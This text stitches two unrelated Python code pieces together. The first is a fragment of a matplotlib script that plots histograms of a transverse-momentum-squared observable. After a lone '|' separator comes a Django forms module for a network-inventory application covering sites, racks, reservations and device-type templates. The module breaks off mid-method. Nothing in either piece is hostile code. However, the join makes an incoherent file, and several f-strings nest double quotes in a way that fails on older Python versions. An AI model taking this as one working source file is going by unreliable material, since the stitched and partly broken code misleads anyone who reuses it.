'label' : r'Transverse momentum squared',
'figsize' : (4, 3.75),
# Ratio
'ylim_ratio' : (0.7, 1.3),
# Histogramming
'bins' : np.linspace(0, 1.5, 60),
'density' : False,
# Function to calculate
'func' : pt2
}
# ------------------------------------------------------------------------
# ** Example **
fig1, ax1 = create_axes(**obs_pt2, ratio_plot=False)
counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax1[0].errorbar(x=cbins, y=counts, yerr=errs, color=(0,0,0), label='Data $\\alpha$', **errorbar_style)
ax1[0].legend(frameon=False)
fig1.savefig('./testfigs/testplot_1.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
fig2, ax2 = create_axes(**obs_pt2, ratio_plot=False)
counts, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax2[0].hist(x=cbins, bins=bins, weights=counts, color=(0.5, 0.2, 0.1), label='Data $\\alpha$', **hist_style_step)
ax2[0].legend(frameon=False)
fig2.savefig('./testfigs/testplot_2.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
fig3, ax3 = create_axes(**obs_pt2, ratio_plot=True)
counts1, errs, bins, cbins = hist(obs_pt2['func'](r1), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax3[0].hist(x=cbins, bins=bins, weights=counts1, color=(0,0,0), label='Data 1', **hist_style_step)
counts2, errs, bins, cbins = hist(obs_pt2['func'](r2), bins=obs_pt2['bins'], density=obs_pt2['density'])
ax3[0].hist(x=cbins, bins=bins, weights=counts2, color=(1,0,0), alpha=0.5, label='Data 2', **hist_style_step)
ordered_legend(ax = ax3[0], order=['Data 1', 'Data 2'])
# Ratio
plot_horizontal_line(ax3[1])
ax3[1].hist(x=cbins, bins=bins, weights=counts2 / (counts1 + 1E-30), color=(1,0,0), alpha=0.5, label='Data $\\beta$', **hist_style_step)
fig3.savefig('./testfigs/testplot_3.pdf', bbox_inches='tight')
# ------------------------------------------------------------------------
# ** Example **
data_template = {
'data' : None,
'weights': None,
'label' : 'Data',
'hfunc' : 'errorbar',
'style' : errorbar_style,
'obs' : obs_pt2,
'hdata' : None,
'color' : None
}
# Data source <-> Observable collections
data1 = data_template.copy() # Deep copies
data2 = data_template.copy()
data3 = data_template.copy()
data4 = data_template.copy()
data1.update({
'data' : r1,
'label' : 'Data $\\alpha$',
'hfunc' : 'errorbar',
'style' : errorbar_style,
})
data2.update({
'data' : r2,
'label' : 'Data $\\beta$',
'hfunc' : 'hist',
'style' : hist_style_step,
})
data3.update({
'data' : r3,
'label' : 'Data $\\gamma$',
'hfunc' : 'hist',
'style' : hist_style_step,
})
data4.update({
'data' : r4,
'label' : 'Data $\\delta$',
'hfunc' : 'plot',
'style' : plot_style,
})
data = [data1, data2, data3, data4]
# Calculate histograms
for i in range(len(data)):
data[i]['hdata'] = hist_obj(data[i]['obs']['func'](data[i]['data']), bins=data[i]['obs']['bins'])
# Plot it
fig4, ax4 = superplot(data, ratio_plot=True, yscale='log')
fig5, ax5 = superplot(data, ratio_plot=True, yscale='linear', ratio_error_plot=False)
fig4.savefig('./testfigs/testplot_4.pdf', bbox_inches='tight')
fig5.savefig('./testfigs/testplot_5.pdf', bbox_inches='tight')
|
import re
from django import forms
from django.contrib.auth.models import User
from django.contrib.contenttypes.models import ContentType
from django.contrib.postgres.forms.array import SimpleArrayField
from django.core.exceptions import ObjectDoesNotExist
from django.utils.safestring import mark_safe
from netaddr import EUI
from netaddr.core import AddrFormatError
from timezone_field import TimeZoneFormField
from circuits.models import Circuit, CircuitTermination, Provider
from extras.forms import (
AddRemoveTagsForm, CustomFieldBulkEditForm, CustomFieldModelCSVForm, CustomFieldFilterForm, CustomFieldModelForm,
LocalConfigContextFilterForm,
)
from extras.models import Tag
from ipam.constants import BGP_ASN_MAX, BGP_ASN_MIN
from ipam.models import IPAddress, VLAN
from tenancy.forms import TenancyFilterForm, TenancyForm
from tenancy.models import Tenant, TenantGroup
from utilities.forms import (
APISelect, APISelectMultiple, add_blank_choice, BootstrapMixin, BulkEditForm, BulkEditNullBooleanSelect,
ColorSelect, CommentField, CSVChoiceField, CSVContentTypeField, CSVModelChoiceField, CSVModelForm,
DynamicModelChoiceField, DynamicModelMultipleChoiceField, ExpandableNameField, form_from_model, JSONField,
NumericArrayField, SelectWithPK, SmallTextarea, SlugField, StaticSelect2, StaticSelect2Multiple, TagFilterField,
BOOLEAN_WITH_BLANK_CHOICES,
)
from virtualization.models import Cluster, ClusterGroup
from .choices import *
from .constants import *
from .models import (
Cable, DeviceBay, DeviceBayTemplate, ConsolePort, ConsolePortTemplate, ConsoleServerPort, ConsoleServerPortTemplate,
Device, DeviceRole, DeviceType, FrontPort, FrontPortTemplate, Interface, InterfaceTemplate, Manufacturer,
InventoryItem, Platform, PowerFeed, PowerOutlet, PowerOutletTemplate, PowerPanel, PowerPort, PowerPortTemplate,
Rack, RackGroup, RackReservation, RackRole, RearPort, RearPortTemplate, Region, Site, VirtualChassis,
)
DEVICE_BY_PK_RE = r'{\d+\}'
INTERFACE_MODE_HELP_TEXT = """
Access: One untagged VLAN<br />
Tagged: One untagged VLAN and/or one or more tagged VLANs<br />
Tagged (All): Implies all VLANs are available (w/optional untagged VLAN)
"""
def get_device_by_name_or_pk(name):
"""
Attempt to retrieve a device by either its name or primary key ('{pk}').
"""
if re.match(DEVICE_BY_PK_RE, name):
pk = name.strip('{}')
device = Device.objects.get(pk=pk)
else:
device = Device.objects.get(name=name)
return device
class DeviceComponentFilterForm(BootstrapMixin, forms.Form):
field_order = [
'q', 'region', 'site'
]
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
device_id = DynamicModelMultipleChoiceField(
queryset=Device.objects.all(),
required=False,
label='Device',
query_params={
'site': '$site'
}
)
class InterfaceCommonForm(forms.Form):
def clean(self):
super().clean()
parent_field = 'device' if 'device' in self.cleaned_data else 'virtual_machine'
tagged_vlans = self.cleaned_data['tagged_vlans']
# Untagged interfaces cannot be assigned tagged VLANs
if self.cleaned_data['mode'] == InterfaceModeChoices.MODE_ACCESS and tagged_vlans:
raise forms.ValidationError({
'mode': "An access interface cannot have tagged VLANs assigned."
})
# Remove all tagged VLAN assignments from "tagged all" interfaces
elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED_ALL:
self.cleaned_data['tagged_vlans'] = []
# Validate tagged VLANs; must be a global VLAN or in the same site
elif self.cleaned_data['mode'] == InterfaceModeChoices.MODE_TAGGED:
valid_sites = [None, self.cleaned_data[parent_field].site]
invalid_vlans = [str(v) for v in tagged_vlans if v.site not in valid_sites]
if invalid_vlans:
raise forms.ValidationError({
'tagged_vlans': f"The tagged VLANs ({", ".join(invalid_vlans)}) must belong to the same site as "
f"the interface's parent device/VM, or they must be global"
})
class ComponentForm(BootstrapMixin, forms.Form):
"""
Subclass this form when facilitating the creation of one or more device component or component templates based on
a name pattern.
"""
name_pattern = ExpandableNameField(
label='Name'
)
label_pattern = ExpandableNameField(
label='Label',
required=False,
help_text='Alphanumeric ranges are supported. (Must match the number of names being created.)'
)
def clean(self):
super().clean()
# Validate that the number of components being created from both the name_pattern and label_pattern are equal
if self.cleaned_data['label_pattern']:
name_pattern_count = len(self.cleaned_data['name_pattern'])
label_pattern_count = len(self.cleaned_data['label_pattern'])
if name_pattern_count != label_pattern_count:
raise forms.ValidationError({
'label_pattern': f'The provided name pattern will create {name_pattern_count} components, however '
f'{label_pattern_count} labels will be generated. These counts must match.'
}, code='label_pattern_mismatch')
#
# Fields
#
class MACAddressField(forms.Field):
widget = forms.CharField
default_error_messages = {
'invalid': 'MAC address must be in EUI-48 format',
}
def to_python(self, value):
value = super().to_python(value)
# Validate MAC address format
try:
value = EUI(value.strip())
except AddrFormatError:
raise forms.ValidationError(self.error_messages['invalid'], code='invalid')
return value
#
# Regions
#
class RegionForm(BootstrapMixin, forms.ModelForm):
parent = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False
)
slug = SlugField()
class Meta:
model = Region
fields = (
'parent', 'name', 'slug', 'description',
)
class RegionCSVForm(CSVModelForm):
parent = CSVModelChoiceField(
queryset=Region.objects.all(),
required=False,
to_field_name='name',
help_text='Name of parent region'
)
class Meta:
model = Region
fields = Region.csv_headers
class RegionFilterForm(BootstrapMixin, forms.Form):
model = Site
q = forms.CharField(
required=False,
label='Search'
)
#
# Sites
#
class SiteForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False
)
slug = SlugField()
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Site
fields = [
'name', 'slug', 'status', 'region', 'tenant_group', 'tenant', 'facility', 'asn', 'time_zone', 'description',
'physical_address', 'shipping_address', 'latitude', 'longitude', 'contact_name', 'contact_phone',
'contact_email', 'comments', 'tags',
]
widgets = {
'physical_address': SmallTextarea(
attrs={
'rows': 3,
}
),
'shipping_address': SmallTextarea(
attrs={
'rows': 3,
}
),
'status': StaticSelect2(),
'time_zone': StaticSelect2(),
}
help_texts = {
'name': "Full name of the site",
'facility': "Data center provider and facility (e.g. Equinix NY7)",
'asn': "BGP autonomous system number",
'time_zone': "Local time zone",
'description': "Short description (will appear in sites list)",
'physical_address': "Physical location of the building (e.g. for GPS)",
'shipping_address': "If different from the physical address",
'latitude': "Latitude in decimal format (xx.yyyyyy)",
'longitude': "Longitude in decimal format (xx.yyyyyy)"
}
class SiteCSVForm(CustomFieldModelCSVForm):
status = CSVChoiceField(
choices=SiteStatusChoices,
required=False,
help_text='Operational status'
)
region = CSVModelChoiceField(
queryset=Region.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned region'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned tenant'
)
class Meta:
model = Site
fields = Site.csv_headers
help_texts = {
'time_zone': mark_safe(
'Time zone (<a href="https://en.wikipedia.org/wiki/List_of_tz_database_time_zones">available options</a>)'
)
}
class SiteBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Site.objects.all(),
widget=forms.MultipleHiddenInput
)
status = forms.ChoiceField(
choices=add_blank_choice(SiteStatusChoices),
required=False,
initial='',
widget=StaticSelect2()
)
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
asn = forms.IntegerField(
min_value=BGP_ASN_MIN,
max_value=BGP_ASN_MAX,
required=False,
label='ASN'
)
description = forms.CharField(
max_length=100,
required=False
)
time_zone = TimeZoneFormField(
choices=add_blank_choice(TimeZoneFormField().choices),
required=False,
widget=StaticSelect2()
)
class Meta:
nullable_fields = [
'region', 'tenant', 'asn', 'description', 'time_zone',
]
class SiteFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
model = Site
field_order = ['q', 'status', 'region', 'tenant_group', 'tenant']
q = forms.CharField(
required=False,
label='Search'
)
status = forms.MultipleChoiceField(
choices=SiteStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
tag = TagFilterField(model)
#
# Rack groups
#
class RackGroupForm(BootstrapMixin, forms.ModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
parent = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
slug = SlugField()
class Meta:
model = RackGroup
fields = (
'region', 'site', 'parent', 'name', 'slug', 'description',
)
class RackGroupCSVForm(CSVModelForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Assigned site'
)
parent = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
to_field_name='name',
help_text='Parent rack group',
error_messages={
'invalid_choice': 'Rack group not found.',
}
)
class Meta:
model = RackGroup
fields = RackGroup.csv_headers
class RackGroupFilterForm(BootstrapMixin, forms.Form):
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
parent = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region',
'site': '$site',
}
)
#
# Rack roles
#
class RackRoleForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = RackRole
fields = [
'name', 'slug', 'color', 'description',
]
class RackRoleCSVForm(CSVModelForm):
slug = SlugField()
class Meta:
model = RackRole
fields = RackRole.csv_headers
help_texts = {
'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
}
#
# Racks
#
class RackForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
query_params={
'region_id': '$region'
}
)
group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
role = DynamicModelChoiceField(
queryset=RackRole.objects.all(),
required=False
)
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = Rack
fields = [
'region', 'site', 'group', 'name', 'facility_id', 'tenant_group', 'tenant', 'status', 'role', 'serial',
'asset_tag', 'type', 'width', 'u_height', 'desc_units', 'outer_width', 'outer_depth', 'outer_unit',
'comments', 'tags',
]
help_texts = {
'site': "The site at which the rack exists",
'name': "Organizational rack name",
'facility_id': "The unique rack ID assigned by the facility",
'u_height': "Height in rack units",
}
widgets = {
'status': StaticSelect2(),
'type': StaticSelect2(),
'width': StaticSelect2(),
'outer_unit': StaticSelect2(),
}
class RackCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name'
)
group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
to_field_name='name'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned tenant'
)
status = CSVChoiceField(
choices=RackStatusChoices,
required=False,
help_text='Operational status'
)
role = CSVModelChoiceField(
queryset=RackRole.objects.all(),
required=False,
to_field_name='name',
help_text='Name of assigned role'
)
type = CSVChoiceField(
choices=RackTypeChoices,
required=False,
help_text='Rack type'
)
width = forms.ChoiceField(
choices=RackWidthChoices,
help_text='Rail-to-rail width (in inches)'
)
outer_unit = CSVChoiceField(
choices=RackDimensionUnitChoices,
required=False,
help_text='Unit for outer dimensions'
)
class Meta:
model = Rack
fields = Rack.csv_headers
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit group queryset by assigned site
params = {f"site__{self.fields["site"].to_field_name}": data.get('site')}
self.fields['group'].queryset = self.fields['group'].queryset.filter(**params)
class RackBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=Rack.objects.all(),
widget=forms.MultipleHiddenInput
)
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
status = forms.ChoiceField(
choices=add_blank_choice(RackStatusChoices),
required=False,
initial='',
widget=StaticSelect2()
)
role = DynamicModelChoiceField(
queryset=RackRole.objects.all(),
required=False
)
serial = forms.CharField(
max_length=50,
required=False,
label='Serial Number'
)
asset_tag = forms.CharField(
max_length=50,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(RackTypeChoices),
required=False,
widget=StaticSelect2()
)
width = forms.ChoiceField(
choices=add_blank_choice(RackWidthChoices),
required=False,
widget=StaticSelect2()
)
u_height = forms.IntegerField(
required=False,
label='Height (U)'
)
desc_units = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect,
label='Descending units'
)
outer_width = forms.IntegerField(
required=False,
min_value=1
)
outer_depth = forms.IntegerField(
required=False,
min_value=1
)
outer_unit = forms.ChoiceField(
choices=add_blank_choice(RackDimensionUnitChoices),
required=False,
widget=StaticSelect2()
)
comments = CommentField(
widget=SmallTextarea,
label='Comments'
)
class Meta:
nullable_fields = [
'group', 'tenant', 'role', 'serial', 'asset_tag', 'outer_width', 'outer_depth', 'outer_unit', 'comments',
]
class RackFilterForm(BootstrapMixin, TenancyFilterForm, CustomFieldFilterForm):
model = Rack
field_order = ['q', 'region', 'site', 'group_id', 'status', 'role', 'tenant_group', 'tenant']
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.all(),
required=False,
label='Rack group',
null_option='None',
query_params={
'site': '$site'
}
)
status = forms.MultipleChoiceField(
choices=RackStatusChoices,
required=False,
widget=StaticSelect2Multiple()
)
type = forms.MultipleChoiceField(
choices=RackTypeChoices,
required=False,
widget=StaticSelect2Multiple()
)
width = forms.MultipleChoiceField(
choices=RackWidthChoices,
required=False,
widget=StaticSelect2Multiple()
)
role = DynamicModelMultipleChoiceField(
queryset=RackRole.objects.all(),
to_field_name='slug',
required=False,
null_option='None'
)
tag = TagFilterField(model)
#
# Rack elevations
#
class RackElevationFilterForm(RackFilterForm):
field_order = ['q', 'region', 'site', 'group_id', 'id', 'status', 'role', 'tenant_group', 'tenant']
id = DynamicModelMultipleChoiceField(
queryset=Rack.objects.all(),
label='Rack',
required=False,
display_field='display_name',
query_params={
'site': '$site',
'group_id': '$group_id',
}
)
#
# Rack reservations
#
class RackReservationForm(BootstrapMixin, TenancyForm, CustomFieldModelForm):
region = DynamicModelChoiceField(
queryset=Region.objects.all(),
required=False,
initial_params={
'sites': '$site'
}
)
site = DynamicModelChoiceField(
queryset=Site.objects.all(),
required=False,
query_params={
'region_id': '$region'
}
)
rack_group = DynamicModelChoiceField(
queryset=RackGroup.objects.all(),
required=False,
query_params={
'site_id': '$site'
}
)
rack = DynamicModelChoiceField(
queryset=Rack.objects.all(),
display_field='display_name',
query_params={
'site_id': '$site',
'group_id': '$rack_group',
}
)
units = NumericArrayField(
base_field=forms.IntegerField(),
help_text="Comma-separated list of numeric unit IDs. A range may be specified using a hyphen."
)
user = forms.ModelChoiceField(
queryset=User.objects.order_by(
'username'
),
widget=StaticSelect2()
)
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = RackReservation
fields = [
'rack', 'units', 'user', 'tenant_group', 'tenant', 'description', 'tags',
]
class RackReservationCSVForm(CustomFieldModelCSVForm):
site = CSVModelChoiceField(
queryset=Site.objects.all(),
to_field_name='name',
help_text='Parent site'
)
rack_group = CSVModelChoiceField(
queryset=RackGroup.objects.all(),
to_field_name='name',
required=False,
help_text="Rack's group (if any)"
)
rack = CSVModelChoiceField(
queryset=Rack.objects.all(),
to_field_name='name',
help_text='Rack'
)
units = SimpleArrayField(
base_field=forms.IntegerField(),
required=True,
help_text='Comma-separated list of individual unit numbers'
)
tenant = CSVModelChoiceField(
queryset=Tenant.objects.all(),
required=False,
to_field_name='name',
help_text='Assigned tenant'
)
class Meta:
model = RackReservation
fields = ('site', 'rack_group', 'rack', 'units', 'tenant', 'description')
def __init__(self, data=None, *args, **kwargs):
super().__init__(data, *args, **kwargs)
if data:
# Limit rack_group queryset by assigned site
params = {f"site__{self.fields["site"].to_field_name}": data.get('site')}
self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
# Limit rack queryset by assigned site and group
params = {
f"site__{self.fields["site"].to_field_name}": data.get('site'),
f"group__{self.fields["rack_group"].to_field_name}": data.get('rack_group'),
}
self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class RackReservationBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=RackReservation.objects.all(),
widget=forms.MultipleHiddenInput()
)
user = forms.ModelChoiceField(
queryset=User.objects.order_by(
'username'
),
required=False,
widget=StaticSelect2()
)
tenant = DynamicModelChoiceField(
queryset=Tenant.objects.all(),
required=False
)
description = forms.CharField(
max_length=100,
required=False
)
class Meta:
nullable_fields = []
class RackReservationFilterForm(BootstrapMixin, TenancyFilterForm):
model = RackReservation
field_order = ['q', 'region', 'site', 'group_id', 'user_id', 'tenant_group', 'tenant']
q = forms.CharField(
required=False,
label='Search'
)
region = DynamicModelMultipleChoiceField(
queryset=Region.objects.all(),
to_field_name='slug',
required=False
)
site = DynamicModelMultipleChoiceField(
queryset=Site.objects.all(),
to_field_name='slug',
required=False,
query_params={
'region': '$region'
}
)
group_id = DynamicModelMultipleChoiceField(
queryset=RackGroup.objects.prefetch_related('site'),
required=False,
label='Rack group',
null_option='None'
)
user_id = DynamicModelMultipleChoiceField(
queryset=User.objects.all(),
required=False,
display_field='username',
label='User',
widget=APISelectMultiple(
api_url='/api/users/users/',
)
)
tag = TagFilterField(model)
#
# Manufacturers
#
class ManufacturerForm(BootstrapMixin, forms.ModelForm):
slug = SlugField()
class Meta:
model = Manufacturer
fields = [
'name', 'slug', 'description',
]
class ManufacturerCSVForm(CSVModelForm):
class Meta:
model = Manufacturer
fields = Manufacturer.csv_headers
#
# Device types
#
class DeviceTypeForm(BootstrapMixin, CustomFieldModelForm):
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all()
)
slug = SlugField(
slug_source='model'
)
comments = CommentField()
tags = DynamicModelMultipleChoiceField(
queryset=Tag.objects.all(),
required=False
)
class Meta:
model = DeviceType
fields = [
'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
'front_image', 'rear_image', 'comments', 'tags',
]
widgets = {
'subdevice_role': StaticSelect2(),
# Exclude SVG images (unsupported by PIL)
'front_image': forms.FileInput(attrs={
'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
}),
'rear_image': forms.FileInput(attrs={
'accept': 'image/bmp,image/gif,image/jpeg,image/png,image/tiff'
})
}
class DeviceTypeImportForm(BootstrapMixin, forms.ModelForm):
manufacturer = forms.ModelChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='name'
)
class Meta:
model = DeviceType
fields = [
'manufacturer', 'model', 'slug', 'part_number', 'u_height', 'is_full_depth', 'subdevice_role',
'comments',
]
class DeviceTypeBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=DeviceType.objects.all(),
widget=forms.MultipleHiddenInput()
)
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False
)
u_height = forms.IntegerField(
min_value=1,
required=False
)
is_full_depth = forms.NullBooleanField(
required=False,
widget=BulkEditNullBooleanSelect(),
label='Is full depth'
)
class Meta:
nullable_fields = []
class DeviceTypeFilterForm(BootstrapMixin, CustomFieldFilterForm):
model = DeviceType
q = forms.CharField(
required=False,
label='Search'
)
manufacturer = DynamicModelMultipleChoiceField(
queryset=Manufacturer.objects.all(),
to_field_name='slug',
required=False
)
subdevice_role = forms.MultipleChoiceField(
choices=add_blank_choice(SubdeviceRoleChoices),
required=False,
widget=StaticSelect2Multiple()
)
console_ports = forms.NullBooleanField(
required=False,
label='Has console ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
console_server_ports = forms.NullBooleanField(
required=False,
label='Has console server ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_ports = forms.NullBooleanField(
required=False,
label='Has power ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
power_outlets = forms.NullBooleanField(
required=False,
label='Has power outlets',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
interfaces = forms.NullBooleanField(
required=False,
label='Has interfaces',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
pass_through_ports = forms.NullBooleanField(
required=False,
label='Has pass-through ports',
widget=StaticSelect2(
choices=BOOLEAN_WITH_BLANK_CHOICES
)
)
tag = TagFilterField(model)
#
# Device component templates
#
class ComponentTemplateCreateForm(ComponentForm):
"""
Base form for the creation of device component templates (subclassed from ComponentTemplateModel).
"""
manufacturer = DynamicModelChoiceField(
queryset=Manufacturer.objects.all(),
required=False,
initial_params={
'device_types': 'device_type'
}
)
device_type = DynamicModelChoiceField(
queryset=DeviceType.objects.all(),
display_field='model',
query_params={
'manufacturer_id': '$manufacturer'
}
)
description = forms.CharField(
required=False
)
class ConsolePortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = ConsolePortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class ConsolePortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
widget=StaticSelect2()
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsolePortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=ConsolePortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
class Meta:
nullable_fields = ('label', 'type', 'description')
class ConsoleServerPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = ConsoleServerPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class ConsoleServerPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
widget=StaticSelect2()
)
field_order = ('manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'description')
class ConsoleServerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=ConsoleServerPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(ConsolePortTypeChoices),
required=False,
widget=StaticSelect2()
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'type', 'description')
class PowerPortTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = PowerPortTemplate
fields = [
'device_type', 'name', 'label', 'type', 'maximum_draw', 'allocated_draw', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
class PowerPortTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerPortTypeChoices),
required=False
)
maximum_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Maximum power draw (watts)"
)
allocated_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Allocated power draw (watts)"
)
field_order = (
'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'maximum_draw', 'allocated_draw',
'description',
)
class PowerPortTemplateBulkEditForm(BootstrapMixin, BulkEditForm):
pk = forms.ModelMultipleChoiceField(
queryset=PowerPortTemplate.objects.all(),
widget=forms.MultipleHiddenInput()
)
label = forms.CharField(
max_length=64,
required=False
)
type = forms.ChoiceField(
choices=add_blank_choice(PowerPortTypeChoices),
required=False,
widget=StaticSelect2()
)
maximum_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Maximum power draw (watts)"
)
allocated_draw = forms.IntegerField(
min_value=1,
required=False,
help_text="Allocated power draw (watts)"
)
description = forms.CharField(
required=False
)
class Meta:
nullable_fields = ('label', 'type', 'maximum_draw', 'allocated_draw', 'description')
class PowerOutletTemplateForm(BootstrapMixin, forms.ModelForm):
class Meta:
model = PowerOutletTemplate
fields = [
'device_type', 'name', 'label', 'type', 'power_port', 'feed_leg', 'description',
]
widgets = {
'device_type': forms.HiddenInput(),
}
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Limit power_port choices to current DeviceType
if hasattr(self.instance, 'device_type'):
self.fields['power_port'].queryset = PowerPortTemplate.objects.filter(
device_type=self.instance.device_type
)
class PowerOutletTemplateCreateForm(ComponentTemplateCreateForm):
type = forms.ChoiceField(
choices=add_blank_choice(PowerOutletTypeChoices),
required=False
)
power_port = forms.ModelChoiceField(
queryset=PowerPortTemplate.objects.all(),
required=False
)
feed_leg = forms.ChoiceField(
choices=add_blank_choice(PowerOutletFeedLegChoices),
required=False,
widget=StaticSelect2()
)
field_order = (
'manufacturer', 'device_type', 'name_pattern', 'label_pattern', 'type', 'power_port', 'feed_leg',
'description',
)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
